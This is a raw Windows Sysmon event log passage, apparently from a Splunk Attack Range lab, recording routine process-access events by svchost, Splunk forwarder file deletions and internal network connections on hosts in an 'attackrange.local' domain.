07:47:08.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046894Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046893Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046892Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046891Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046890Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046889Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.383{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046888Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.383{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046887Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.383{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046886Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.383{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046885Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.383{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046884Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.383{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046883Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.383{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046882Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.383{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046881Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.383{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046880Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.383{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046879Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.383{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046878Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.383{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046877Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.383{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046876Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.382{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046875Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.382{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046874Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.382{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046873Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:08.382{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046872Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.382{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001046871Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.350{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F61B5A362EEE39D9FDD7F2483ACA6F49,SHA256=2355CBD9300B4BBDBD4FF1B57493B38812AC2A74D539DA915FDFB0F5C3B292A4,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000806608Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:09.929{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86B99A2FD8FDE60C58FF7CC88B45F025,SHA256=637CB51224FDD874248855916AAA630B851252E7014C8B5EE96BAD8A0DE665F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046951Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:09.664{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A1566DB21CD5B39249FC5F7546A729D,SHA256=FC7D635BCAE5FD53BE7216C77D26BCB213A3D74A522128C14744BA5E9A2387F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806609Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:10.929{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=798E7A6227FC066F66C297CB26592AD4,SHA256=9CE08CA258A371C509F36C05D8F6B79BD87130904DCD5B1061094E337F8AE8F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046952Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:10.681{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F535AD7117B2200B7DDA7ED3B7F200F,SHA256=52728BE1C6A5CB60F632B34AFB39FDD478E320976D3BAC44E689BEE0AA534D4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046953Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:11.716{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3B7BEC64779DAF5394F448C6D22864A,SHA256=AD6EDD8E18B3D7E6622037FDA98146A06E6936C58588ED45E9DA85E57FEF6CC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806611Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:11.944{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=209230ACE31B63B292D19855B0E8F061,SHA256=F87BD37C2A1DD66E1B10B2FE23F572432432C9E281F8DA2638E28AA029C5FB57,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806610Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:10.296{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57198-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001046955Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:04.669{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50950-false10.0.1.12-8000- 23542300x80000000000000001046954Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:12.731{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0DAF694A764391F1D6DED69B88C1325,SHA256=963B4E0557DFBF7DEBF244906B1832A83CBC5E60995FAA49108A8D5F5A51E061,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806612Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:12.976{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4ED0AC3EF48A9429704179658FA547AB,SHA256=64DC3533F2701138E6C38F1D0A6859AE3336F3B16C15B3151DCE35C090E04006,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046956Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:13.746{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D01C279BE35E359EB01DAAE2A6D5A2B,SHA256=8D3BF21ED9EA98EF0C402B78E453CD2AC49ABF66215DD8A3E6106108302212F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046957Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:14.746{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19A5A8A98E28D6376F02497042288844,SHA256=727A6404F615996608F92F36D0EBD0E71EFE7788CAE3A5001F9D326A7F15B0B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806613Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:14.003{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9422EA7388B13A4089F15008A7493AA9,SHA256=DAB62DC16E53ED461D15CB4081046F0CA8F2A286619AEC64ABB86C74811394FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046960Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:15.760{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 